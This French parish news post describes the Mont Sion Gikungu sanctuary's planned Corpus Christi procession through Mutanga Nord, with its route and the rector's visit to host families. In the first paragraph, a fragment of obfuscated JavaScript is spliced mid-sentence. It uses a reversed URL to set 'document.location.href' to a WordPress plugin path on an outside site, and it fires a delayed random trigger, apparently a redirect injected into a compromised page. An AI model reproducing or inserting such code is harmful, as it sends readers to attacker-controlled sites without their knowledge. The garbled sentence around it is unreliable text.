La fête du Saint Sacrement a toujours été minutieusement préparée et organisée, car après la sainte Messe qui se déroule à l’ordinaire il y a une procession avec le Saint Sacrement en dehors des enceintes de l’église. Le Sanctuaire Marial de Mont Sion Gikungu tient à cette belle pratique religieuse telle que proposée au niveau de l’Eglise toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont nous sommes membres.

La menace de la propagation de la pandémie de covid-19 étant devenue moins stressante, la circulation et le groupement des personnes peuvent être permis dans certains cas en suivant les prescriptions des agents de santé et bien entendu avec accord des autorités habileté. Le Sanctuaire, ayant obtenu gain de cause en tout cela, va faire cette procession dans le quartier de Mutanga Nord ce dimanche 19 Juin de l’année en cours. Pour se rassurer de la bonne passation de la procession que plus d’un attendaient depuis l’irruption de la pandémie, le Père Recteur du Sanctuaire, accompagné par certains membres de la commission Liturgie et de la sacristie, a effectué une visite de lieux dans cinq familles choisies pour accueillir le Saint Sacrement lors de son passage au quartier, c’était ce soir du jeudi 16 courant. Il est prévu que la procession suivra l’itinéraire des avenues suivantes : l’Agriculture, Buyogoma, Lycée, Abanyagihugu avant de rejoindre l’avenue du départ pour rejoindre enfin Mont Sion.

Lors du choix de l’itinéraire dans une réunion du Conseil Élargi des pèlerins du 20 mai dernier, on ne s’est peut-être pas rendu compte qu’il y a quelque chose en commun pour toutes les familles, mais la communication a bien vu que trois sur cinq des familles à visiter ont des personnes âgées et malades, vraiment souffrants. Peut-être Jésus a-t-il voulu réconforter les nôtres qui souffrent. Nous espérons que le service de la rédaction de ce jour attendu nous en fera savoir plus avec des images, témoignages et commentaires sur tout ce qui se fera.

NYANDWI M.